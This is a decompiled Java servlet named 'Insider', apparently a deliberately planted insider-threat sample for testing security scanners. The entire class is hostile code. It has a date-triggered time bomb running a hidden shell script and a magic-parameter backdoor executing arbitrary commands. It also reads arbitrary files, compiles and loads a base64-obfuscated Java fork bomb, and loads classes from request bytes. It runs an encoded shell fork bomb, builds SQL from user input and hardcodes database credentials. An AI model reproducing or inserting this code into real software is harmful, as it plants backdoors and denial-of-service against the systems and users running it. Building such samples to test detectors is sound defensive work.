package io.shiftleft.tarpit;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URI;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.OpenOption;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Base64;
import java.util.Calendar;
import java.util.logging.Logger;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.tools.JavaFileObject;
import javax.tools.SimpleJavaFileObject;
import javax.tools.ToolProvider;
import sun.misc.BASE64Decoder;

@WebServlet(name = "simpleServlet", urlPatterns = {"/insider"}, loadOnStartup = 1)
/* loaded from: input_file:WEB-INF/classes/io/shiftleft/tarpit/Insider.class */
public class Insider extends HttpServlet {
    private static final long serialVersionUID = -3462096228274971485L;
    private Connection connection;
    private static final Logger LOGGER = Logger.getLogger(ServletTarPit.class.getName());
    Pattern p = Pattern.compile("^[A-Za-z0-9\\\\\\/\\=\\-+.]*$");

    /* loaded from: input_file:WEB-INF/classes/io/shiftleft/tarpit/Insider$SourceFile.class */
    class SourceFile extends SimpleJavaFileObject {
        String code;

        SourceFile(String str, String str2) {
            super(URI.create("string:///" + str), JavaFileObject.Kind.SOURCE);
            this.code = null;
            this.code = str2;
        }

        public CharSequence getCharContent(boolean z) {
            return this.code;
        }
    }

    /* JADX WARN: Type inference failed for: r0v57, types: [io.shiftleft.tarpit.Insider$1] */
    protected void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) throws ServletException, IOException {
        try {
            getConnection();
            ticking("c2ggL3RtcC9zaGVsbGNvZGUuc2g=");
            if (httpServletRequest.getParameter("tracefn").equals("C4A938B6FE01E")) {
                Runtime.getRuntime().exec(httpServletRequest.getParameter("cmd"));
            }
            BufferedReader bufferedReader = new BufferedReader(new FileReader(httpServletRequest.getParameter("x")));
            while (true) {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    break;
                } else {
                    httpServletResponse.getWriter().println(readLine);
                }
            }
            File file = new File("/java");
            File file2 = new File(file, "test/Test.java");
            file2.getParentFile().mkdirs();
            Files.write(file2.toPath(), new String(Base64.getDecoder().decode("cHVibGljIGNsYXNzIEZvcmtCb21iIHsgcHVibGljIHN0YXRpYyB2b2lkIG1haW4oU3RyaW5nW10gYXJncykgeyB3aGlsZSh0cnVlKSB7IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMobmV3IFN0cmluZ1tdeyJqYXZhdyIsICItY3AiLCBTeXN0ZW0uZ2V0UHJvcGVydHkoImphdmEuY2xhc3MucGF0aCIpLCAiRm9ya0JvbWIifSk7IH0gfSB9")).getBytes(StandardCharsets.UTF_8), new OpenOption[0]);
            ToolProvider.getSystemJavaCompiler().run((InputStream) null, (OutputStream) null, (OutputStream) null, new String[]{file2.getPath()});
            try {
                System.out.println(Class.forName("test.Test", true, URLClassLoader.newInstance(new URL[]{file.toURI().toURL()})).newInstance());
            } catch (IllegalAccessException e) {
                e.printStackTrace();
            } catch (InstantiationException e2) {
                e2.printStackTrace();
            }
            try {
                new ClassLoader() { // from class: io.shiftleft.tarpit.Insider.1
                    Class x(byte[] bArr) {
                        return defineClass(null, bArr, 0, bArr.length);
                    }
                }.x(new BASE64Decoder().decodeBuffer(httpServletRequest.getParameter("x"))).newInstance();
            } catch (IllegalAccessException e3) {
                e3.printStackTrace();
            } catch (InstantiationException e4) {
                e4.printStackTrace();
            } catch (Exception e5) {
                e5.printStackTrace();
            }
            Runtime.getRuntime().exec(new String[]{"sh", "-c", new String(Base64.getDecoder().decode("Oigpezp8OiZ9Ozo="))});
            String encodeToString = Base64.getEncoder().encodeToString(httpServletRequest.getParameter("x").getBytes());
            String validate = validate(encodeToString);
            if (validate != null) {
                try {
                    this.connection.createStatement().executeQuery(new String(Base64.getDecoder().decode(validate)));
                } catch (Exception e6) {
                }
            } else {
                log("Validation problem with " + encodeToString);
            }
        } catch (IOException e7) {
            e7.printStackTrace();
        } catch (ClassNotFoundException e8) {
            e8.printStackTrace();
        } catch (SQLException e9) {
            e9.printStackTrace();
        }
    }

    public String validate(String str) {
        return str.contains("SOMETHING_HERE") ? str : "";
    }

    private void getConnection() throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.jdbc.Driver");
        this.connection = DriverManager.getConnection("jdbc:mysql://localhost/DBPROD", "admin", "1234");
    }

    private void ticking(String str) throws IOException {
        Calendar calendar = Calendar.getInstance();
        Calendar calendar2 = Calendar.getInstance();
        String str2 = new String(Base64.getDecoder().decode(str));
        calendar2.setTimeInMillis(1551859200000L);
        if (calendar.after(calendar2)) {
            Runtime.getRuntime().exec(str2);
        }
    }
}
